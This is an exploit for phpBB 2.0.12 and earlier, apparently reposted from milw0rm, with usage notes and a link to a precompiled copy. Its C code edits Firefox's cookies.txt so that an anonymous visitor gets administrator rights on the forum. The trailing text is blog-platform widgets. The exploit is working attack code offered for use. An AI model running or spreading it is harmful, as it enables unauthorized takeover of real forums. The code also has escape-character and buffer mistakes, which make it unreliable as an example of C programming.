phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)

/* Paisterist's code was nice but heres mil's version.
 * precompiled: http://www.milw0rm.com/sploits/897.rar
 * Usage: 
 * bcc32 897.cpp
 * and place the exe in your firefox profile dir.
 * Usually C:/Documents and Settings/Application Data/Mozilla/Firefox/Profiles/something.default
 * Visit a site with phpbb, close the browser, double click the exe, browse site.
 * This gives anonymous users administrator rights only.
 * Ya its lame im bored kthnx. If something goes wrong clear cookies.
 * 
 * /str0ke
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;

if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
       {
       printf("malloc issue.../n");
       return new_text;
       }
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
       {
       new_text[j] = text[i];
       i++;
       j++;
       }
       else
       {
           strcat (new_text, replace);
           i += len_find;
           j += len_replace;
           found = strstr (text + i, find);
       }
       new_text[j] = '/0';
}
return new_text;
}

int main()
{
  FILE * pFile;
  long lSize;
  char * buffer;

  pFile = fopen ( "cookies.txt" , "r" );
  if (pFile==NULL) exit (1);

  fseek (pFile , 0 , SEEK_END);
  lSize = ftell (pFile);
  rewind (pFile);

  buffer = (char*) malloc (lSize);
  if (buffer == NULL) exit (2);
  fread (buffer,1,lSize,pFile);
  fclose (pFile);

  pFile = fopen ( "cookies.txt" , "w" );
  fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
  fclose (pFile);
  free (buffer);
  return 0;

}
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值